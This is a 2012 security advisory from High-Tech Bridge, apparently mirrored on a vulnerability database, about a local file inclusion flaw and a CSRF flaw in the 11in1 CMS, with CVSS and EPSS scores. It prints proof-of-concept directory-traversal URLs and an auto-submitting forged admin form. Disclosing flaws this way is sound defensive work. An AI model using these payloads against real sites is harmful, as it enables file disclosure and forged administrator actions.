Lucene search

K
htbridgeHigh-Tech BridgeHTB23071
HistoryJan 25, 2012 - 12:00 a.m.

Multiple vulnerabilities in 11in1

2012-01-2500:00:00
High-Tech Bridge
www.htbridge.com
22

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.01 Low

EPSS

Percentile

82.3%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in 11in1, which can be exploited to perform Local File Inclusion and Сross-Site Request Forgery (CSRF) attacks.

  1. Local File Inclusion in 11in1: CVE-2012-0996
    Input passed via the “class” GET parameter to index.php and /admin/index.php is not properly verified before being used to include local files.
    This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
    The following PoC (Proof of Concept) demostrate the vulnerability:
    http://[host]/index.php?class=…/…/…/tmp/file%00
    http://[host]/admin/index.php?class=…/…/…/tmp/file%00
    Successful exploitation of the vulnerabilities requires that “magic_quotes_gpc” is off.

  2. Сross-Site Request Forgery (CSRF) in 11in1: CVE-2012-0997
    The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests.
    An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.
    The following PoC will create a new topic on behalf of website administrator:
    <form action=“http://[host]/admin/index.php?class=do&action=addTopic” method=“post”>
    <input type=“hidden” name=“name” value=“New Topic Name here”>
    <input type=“hidden” name=“sec” value=“3”>
    <input type=“hidden” name=“content” value=“New Topic Content here”>
    <input type=“submit” id=“btn”>
    </form>
    <script>
    document.getElementById(‘btn’).click();
    </script>

CPENameOperatorVersion
11in1le1.2.1

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.01 Low

EPSS

Percentile

82.3%